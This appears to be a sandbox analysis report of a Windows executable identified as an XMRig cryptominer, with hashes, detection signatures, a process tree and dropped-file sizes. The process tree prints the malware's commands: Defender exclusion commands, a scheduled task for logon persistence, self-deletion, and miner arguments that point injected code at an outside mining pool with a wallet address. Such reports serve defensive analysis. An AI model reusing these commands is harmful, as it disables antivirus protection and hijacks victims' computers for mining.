Analysis
-
max time kernel
1s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
26/12/2023, 12:44
General
-
Target
6f7219715d28fc70c643a533dc18ae59.exe
-
Size
181KB
-
MD5
6f7219715d28fc70c643a533dc18ae59
-
SHA1
d8564e27b1011742e3ec319e8c82799e09f8de32
-
SHA256
a2da5599a60e8ac42be25c62590b16ead68662e9aa058bb34dd92203c1d5258f
-
SHA512
446314df4b428ec68d51f1fa24b7cbb07f794b74fc3a8ffda83513a05ca63114925c40ba412d9a2f48f51e25e950ef3181766a8b9e9c50542acda98575ff743d
-
SSDEEP
3072:IUK7uTpRT+svVghXku4kzxS6nFMO7DlYH3oeuOV5bY98gCGT5rWzs/lls:pKyFRTbv6hSYx/6O7DlYXoS3bA8gCGTL
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 15 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\6f7219715d28fc70c643a533dc18ae59.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"' & exit2⤵
-
-
C:\Users\Admin\AppData\Roaming\iservices64.exe"C:\Users\Admin\AppData\Roaming\iservices64.exe"2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Roaming\iservices64.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Roaming\iservices64.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"' & exit5⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=49axpQBmNV26hPsjUZLfcDiuA7ojjMLpw3yi5b1ctbxfXkQwjCReJ9fGReMLE4Xba4LdkHdfZtduEiJbtZeYGvYJA7kFLnk --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D/kfSIUzd5l3u8L1pjMshOBtlSZ9jBIi41GFvyT9Uti" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"'1⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "iservices64" /tr '"C:\Users\Admin\AppData\Roaming\iservices64.exe"'1⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
128KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
200KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB